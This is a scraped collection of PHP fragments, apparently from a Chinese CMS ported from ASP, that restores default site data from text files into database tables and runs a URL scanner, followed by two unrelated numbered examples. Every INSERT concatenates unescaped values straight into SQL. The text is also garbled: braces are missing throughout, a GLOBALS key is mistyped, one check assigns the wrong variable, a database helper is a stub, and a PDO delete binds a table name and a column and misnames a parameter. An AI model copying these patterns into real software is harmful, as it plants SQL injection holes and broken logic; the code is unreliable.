                    if ($nofollow == '1' || lCase($nofollow) == 'true') {
                        $nofollow = 1;
                    } else {
                        $nofollow = 0;
                    //call echo("title",title)
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'SearchStat (title,webtitle,webkeywords,webdescription,customaurl,target,isthrough,sortrank,isonhtml,nofollow) values(\'' . $title . '\',\'' . $webtitle . '\',\'' . $webkeywords . '\',\'' . $webdescription . '\',\'' . $customaurl . '\',\'' . $target . '\',' . $isthrough . ',' . $sortrank . ',' . $isonhtml . ',' . $nofollow . ')');
    $itemid = '';
    $userName = '';
    $ip = '';
    $reply = '';
    $tableName = '';
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'TableComment');
    $content = getDirTxtList($webdataDir . '/TableComment/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('评论', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【title】') > 0) {
                    $s = $s . vbCrlf();
                    $tableName = newGetStrCut($s, 'tablename');
                    $title = newGetStrCut($s, 'title');
                    $itemid = getArticleId(newGetStrCut($s, 'itemid'));
                    if ($itemid == '') {
                        $itemid = 0;
                    //call echo("itemID",itemID)
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $userName = newGetStrCut($s, 'username');
                    $ip = newGetStrCut($s, 'ip');
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $reply = newGetStrCut($s, 'reply');
                    $isthrough = newGetStrCut($s, 'isthrough');
                    if ($isthrough == '0' || lCase($isthrough) == 'false') {
                        $isthrough = 0;
                    } else {
                        $isthrough = 1;
                    //call echo("title",title)
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'TableComment (tablename,title,itemid,adddatetime,username,ip,bodycontent,reply,isthrough) values(\'' . $tableName . '\',\'' . $title . '\',' . $itemid . ',\'' . $adddatetime . '\',\'' . $userName . '\',\'' . $ip . '\',\'' . $bodycontent . '\',\'' . $reply . '\',' . $isthrough . ')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'FriendLink');
    $content = getDirTxtList($webdataDir . '/FriendLink/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('评论', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【title】') > 0) {
                    $s = $s . vbCrlf();
                    $title = newGetStrCut($s, 'title');
                    $httpurl = newGetStrCut($s, 'httpurl');
                    $smallimage = newGetStrCut($s, 'smallimage');
                    $flags = newGetStrCut($s, 'flags');
                    $target = newGetStrCut($s, 'target');
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '0' || lCase($sortrank) == 'false') {
                        $sortrank = 0;
                    } else {
                        $sortrank = 1;
                    $isthrough = newGetStrCut($s, 'isthrough');
                    if ($isthrough == '0' || lCase($isthrough) == 'false') {
                        $isthrough = 0;
                    } else {
                        $isthrough = 1;
                    //call echo("title",title)
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'FriendLink (title,httpurl,smallimage,flags,sortrank,isthrough,target) values(\'' . $title . '\',\'' . $httpurl . '\',\'' . $smallimage . '\',\'' . $flags . '\',' . $sortrank . ',' . $isthrough . ',\'' . $target . '\')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'GuestBook');
    $content = getDirTxtList($webdataDir . '/GuestBook/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('留言', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【adddatetime】') > 0) {
                    $s = $s . vbCrlf();
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $reply = newGetStrCut($s, 'reply');
                    $isthrough = newGetStrCut($s, 'isthrough');
                    if ($isthrough == '0' || lCase($isthrough) == 'false') {
                        $isthrough = 0;
                    } else {
                        $isthrough = 1;
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'GuestBook (adddatetime,bodycontent,reply,isthrough) values(\'' . $adddatetime . '\',\'' . $bodycontent . '\',\'' . $reply . '\',' . $isthrough . ')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'CaiWeb');
    $content = getDirTxtList($webdataDir . '/CaiWeb/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('采集网站', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【bigclassname】') > 0) {
                    $s = $s . vbCrlf();
                    $bigClassName = newGetStrCut($s, 'bigclassname');
                    $httpurl = newGetStrCut($s, 'httpurl');
                    $morepageurl = newGetStrCut($s, 'morepageurl');
                    $charset = newGetStrCut($s, 'charset');
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $bodycontent = newGetStrCut($s, 'bodycontent');
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '') {
                        $sortrank = 0;
                    $thispage = newGetStrCut($s, 'thispage');
                    if ($thispage == '') {
                        $thispage = 0;
                    $countpage = newGetStrCut($s, 'countpage');
                    if ($countpage == '') {
                        $thispage = 0;
                    $columnname = newGetStrCut($s, 'columnname');
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'CaiWeb (adddatetime,bodycontent,httpurl,morepageurl,charset,sortrank,thispage,countpage,bigclassname,columnname) values(\'' . $adddatetime . '\',\'' . $bodycontent . '\',\'' . $httpurl . '\',\'' . $morepageurl . '\',\'' . $charset . '\',' . $sortrank . ',' . $thispage . ',' . $countpage . ',\'' . $bigClassName . '\',\'' . $columnname . '\')');
    connexecute('delete from ' . $GLOBALS['db_PREFIX'] . 'CaiConfig');
    $content = getDirTxtList($webdataDir . '/CaiConfig/');
    $content = contentNameSort($content, '');
    $splStr = aspSplit($content, vbCrlf());
    foreach ($splStr as $key => $filePath) {
        $fileName = getFileName($filePath);
        if ($filePath != '' && inStr('_#', left($fileName, 1)) == false) {
            aspEcho('采集配置', $filePath);
            $content = GetFText($filePath);
            //这样做是为了从GitHub下载时它把vbcrlf转成 chr(10)  20160409
            if (inStr($content, vbCrlf()) == false) {
                $content = replace($content, chr(10), vbCrlf());
            $splxx = aspSplit($content, vbCrlf() . '-------------------------------');
            foreach ($splxx as $key => $s) {
                if (inStr($s, '【bigclassname】') > 0) {
                    $s = $s . vbCrlf();
                    $bigClassName = newGetStrCut($s, 'bigclassname');
                    $sType = newGetStrCut($s, 'stype');
                    $startStr = newGetStrCut($s, 'startstr');
                    $endStr = newGetStrCut($s, 'endstr');
                    $startaddstr = newGetStrCut($s, 'startaddstr');
                    $endaddstr = newGetStrCut($s, 'endaddstr');
                    $adddatetime = newGetStrCut($s, 'adddatetime');
                    $sortrank = newGetStrCut($s, 'sortrank');
                    if ($sortrank == '') {
                        $sortrank = 0;
                    $saction = newGetStrCut($s, 'saction');
                    $isthrough = newGetStrCut($s, 'isthrough');
                    $isthrough = IIF($isthrough == '0' || lCase($isthrough) == 'false', 0, 1);
                    $fieldName = newGetStrCut($s, 'fieldname');
                    $fieldcheck = newGetStrCut($s, 'fieldcheck');
                    if ($fieldcheck == '') {
                        $fieldcheck = 0;
                    connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'CaiConfig (adddatetime,sortrank,bigclassname,stype,startstr,endstr,startaddstr,endaddstr,saction,isthrough,fieldname,fieldcheck) values(\'' . $adddatetime . '\',' . $sortrank . ',\'' . $bigClassName . '\',\'' . $sType . '\',\'' . $startStr . '\',\'' . $endStr . '\',\'' . $startaddstr . '\',\'' . $endaddstr . '\',\'' . $saction . '\',' . $isthrough . ',\'' . $fieldName . '\',' . $fieldcheck . ')');
    writeSystemLog('', '恢复默认数据' . $GLOBALS['db_PREFIX']);
function runScanWebUrl()
    $nSetTime = '';
    $setCharSet = '';
    $httpUrl = '';
    $url = '';
    $selectWeb = '';
    $nThis = '';
    $nCount = '';
    $startTime = '';
    $setCharSet = 'gb2312';
    $httpUrl = 'http://sharembweb.com/';
    if ($selectWeb == 'ufoer') {
        $httpUrl = 'http://www.ufoer.com/';
        $setCharSet = 'utf-8';
    $nThis = @$_REQUEST['nThis'];
    if ($nThis == '') {
        $nThis = 0;
    } else {
        $nThis = cint($nThis);
    $GLOBALS['conn='] = OpenConn();
    $rsObj = $GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'weburlscan');
    $nCount = @$_REQUEST['nCount'];
    if ($nCount == '') {
        $nCount = @mysql_num_rows($rsObj);
    if (@mysql_num_rows($rsObj) == 0) {
        connexecute('insert into ' . $GLOBALS['db_PREFIX'] . 'weburlscan(httpurl,title,isthrough,charset) values(\'' . $httpUrl . '\',\'home\',true,\'' . $setCharSet . '\')');
    $rsxObj = $GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'weburlscan where isThrough=true');
    if (@mysql_num_rows($rsxObj) != 0) {
        $rsx = mysql_fetch_array($rsxObj);
        $nThis = $nThis + 1;
        aspEcho($nThis, $rsx['httpurl']);
        $nSetTime = scanUrl($rsx['httpurl'], $rsx['title'], $rsx['charset']);
        connexecute('update ' . $GLOBALS['db_PREFIX'] . 'weburlscan  set isthrough=false  where id=' . $rsx['id'] . '');
        $startTime = @$_REQUEST['startTime'];
        if ($startTime == '') {
            $startTime = now();
        $url = getUrlAddToParam(getThisUrl(), '?nThis=' . $nThis . '&nCount=' . $nCount . '&startTime=' . $startTime . '&N=' . getRnd(11), 'replace');
        Rw(jsTiming($url, $nSetTime));
    aspEcho('操作完成', '<a href=\'?act=dispalyManageHandle&actionType=WebUrlScan&addsql=order by id desc&lableTitle=网址扫描\'>OK,共(' . $nThis . ')条</a>');
    $rsObj = $GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'weburlscan where webstate=404');
    while ($rs = $GLOBALS['conn']->fetch_array($rsObj)) {
        aspEcho('<a href=\'' . $rs['httpurl'] . '\' target=\'_blank\'>' . $rs['httpurl'] . '</a>', '<a href=\'' . $rs['tohttpurl'] . '\' target=\'_blank\'>' . $rs['tohttpurl'] . '</a>');
Exemple #13
function connExecute($sql)
    $conn = OpenConn();
    $User = M(); 
    return array("1", "22");
Exemple #14
function deleteItem($table, $idColumn, $id)
    try {
        include_once './panels/dbConnect.php';
        $dbh = OpenConn();
        $stmt = $dbh->prepare("DELETE from :table WHERE :idColumn=:id");
        $stmt->bindParam(":table", $table);
        $stmt->bindParam(":idColumn", $idColumn);
        $stmt->bindParam(":ID", $id);
        if ($stmt->execute()) {
            echo "<p class='debug'>{$id} Deleted</p>";
    } catch (PDOException $e) {
        print "Error!: " . $e->getMessage() . "<br/>";